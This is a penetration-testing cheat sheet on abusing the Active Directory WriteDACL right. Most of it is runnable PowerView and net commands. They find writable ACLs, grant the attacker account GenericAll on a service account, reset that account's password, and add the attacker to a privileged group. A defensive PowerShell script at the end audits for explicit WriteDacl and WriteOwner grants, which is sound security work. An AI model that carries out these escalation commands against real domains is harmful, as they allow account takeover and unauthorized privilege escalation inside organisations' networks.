WriteDACL

Enumerate the ACEs the current user holds on domain user objects (the command lists every ACE whose identity resolves to us; look for WriteDacl in the ActiveDirectoryRights field)

Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

Grant ourselves (here the offsec account) the GenericAll access right on the TestService2 object

Add-DomainObjectAcl -TargetIdentity testservice2 -PrincipalIdentity offsec -Rights All

Verify that GenericAll was applied correctly

Get-ObjectAcl -Identity testservice2 -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

Let’s proceed to change its password

net user testservice2 h4x /domain

The WriteDACL access right is effectively as powerful as GenericAll: whoever can rewrite an object's DACL can grant themselves any other right on it, as the steps above show.

Example

Grant ourselves full rights to the object via WriteDACL (using PowerSploit's PowerView)

Add-DomainObjectAcl -TargetIdentity "MailAdmins" -Rights All -PrincipalIdentity 'sqlsvc' -Verbose

Add ourselves to the group

Add-DomainGroupMember -Identity "MailAdmins" -Members 'sqlsvc' -Verbose
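From the defender's side, the following PowerShell is an added example (not part of the original page or of PowerSploit) that audits user and group objects for explicit ACEs granting WriteDacl or WriteOwner to principals outside an allow-list, which is exactly the foothold abused above. It assumes the RSAT ActiveDirectory module is installed and that the account running it can read the directory; the allow-list and the `Find-DangerousAces` function name are my own choices.

```powershell
# Added defensive example: flag explicit ACEs on user/group objects that grant
# WriteDacl or WriteOwner to principals other than the expected administrators.
# Assumes the RSAT ActiveDirectory module (provides the AD: PSDrive used by Get-Acl).
Import-Module ActiveDirectory

# GenericAll (0xF01FF) contains both bits, so this mask also catches GenericAll grants.
$dangerous = [int][System.DirectoryServices.ActiveDirectoryRights]::WriteDacl -bor
             [int][System.DirectoryServices.ActiveDirectoryRights]::WriteOwner

# Principals expected to hold these rights; adjust for your environment (assumption).
$domain  = (Get-ADDomain).NetBIOSName
$allowed = @("$domain\Domain Admins", "$domain\Enterprise Admins",
             'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')

function Find-DangerousAces {
    param([string[]]$ObjectClasses = @('user', 'group'))
    foreach ($class in $ObjectClasses) {
        # (objectClass=user) also matches computer objects, which is intended here.
        Get-ADObject -LDAPFilter "(objectClass=$class)" -Properties distinguishedName |
        ForEach-Object {
            $dn  = $_.DistinguishedName
            $acl = Get-Acl -Path "AD:\$dn"
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($ace.IsInherited) { continue }            # explicit grants only
                if ((([int]$ace.ActiveDirectoryRights) -band $dangerous) -eq 0) { continue }
                if ($allowed -contains $ace.IdentityReference.Value) { continue }
                [pscustomobject]@{
                    Object    = $dn
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.ActiveDirectoryRights
                    Owner     = $acl.Owner
                }
            }
        }
    }
}

Find-DangerousAces | Sort-Object Principal | Format-Table -AutoSize
```

The Owner column is included because an object's owner implicitly holds WriteDacl even with no explicit ACE, so owners outside the allow-list deserve the same review as flagged ACEs.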
